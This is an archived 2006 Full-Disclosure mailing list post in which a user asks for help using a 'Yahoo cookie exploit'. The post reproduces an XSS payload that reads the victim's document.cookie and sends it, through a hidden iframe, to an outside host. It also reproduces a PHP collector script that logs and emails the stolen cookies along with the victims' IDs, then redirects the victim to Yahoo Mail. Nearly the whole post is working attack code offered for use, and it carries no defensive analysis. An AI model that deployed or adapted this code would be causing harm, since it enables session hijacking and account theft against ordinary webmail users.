lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon Apr 17 19:37:45 2006
From: iustin3lu at yahoo.com (iustin Darloman)
Subject: Help me with Yahoo cookie exploit




  

  Hello my name is Justin and i want to ask you if there is a  program that exploits cookies on yahoo ...i can't understand what those  mean... and i can't use the vulnerability...please help me 
   
  i found this script 
   
  <DIV id=b style="VISIBILITY: hidden">
<STYLE  onload="window.status=''; var x =  escape(document.cookie).substr(0,1900); b.innerHTML='<iframe  src=http://domeniu.com/as.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp&cookie=\''+x+'\'  frameborder=0 width=10 height=10></iframe>';" type=text/css>
</STYLE>
</DIV>

  and this php file 
   
  <?php
$file="cookie.log";
if (isset($_REQUEST["cookie"]) && isset($_REQUEST["id"])){
$logcookie = $_REQUEST["cookie"];
$logcookie = rawurldecode($logcookie);
$logemail = $_REQUEST["id"];
$logemail = rawurldecode($logemail);
if   (file_exists($file)) {
$handle=fopen($file, "r+");
$filecontence=fread($handle,filesize("$file"));
fclose($handle);
}
$handle=fopen($file, "w");
fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
//Writing email address and cookie then the rest of the log
fclose($handle);
mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n");
}
header("Location: http://mail.yahoo.com");
?>

  but i don't know how to use them :(...please help me...
  WIth respect, Justin!

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060417/19b3adfa/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ